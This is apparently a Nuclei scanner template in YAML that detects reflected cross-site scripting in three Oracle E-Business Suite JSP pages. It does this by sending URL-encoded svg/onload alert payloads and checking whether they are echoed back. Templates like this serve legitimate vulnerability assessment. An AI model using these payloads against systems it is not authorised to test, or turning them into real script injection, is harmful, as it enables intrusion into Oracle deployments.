37 lines
1.3 KiB
YAML
37 lines
1.3 KiB
YAML
id: oracle-ebs-xss
|
|
|
|
info:
|
|
name: Oracle E-Business Suite - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Oracle E-Business Suite is vulnerable to Cross Site Scripting.
|
|
reference:
|
|
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
|
|
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
|
|
metadata:
|
|
max-request: 3
|
|
tags: oracle,xss,ebs,intrusive
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
- "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
- "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=alert('{{randstr}}')>"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
# digest: 490a0046304402203a8a7410253031557d25cdfb2e14e59465f4c948e11433e8008eb783b624e80b02207781072ebba035f2f42a3ac1d149c6d170f969240a829a19db31daa73a7b70cb:922c64590222798bb761d5b6d8e72950 |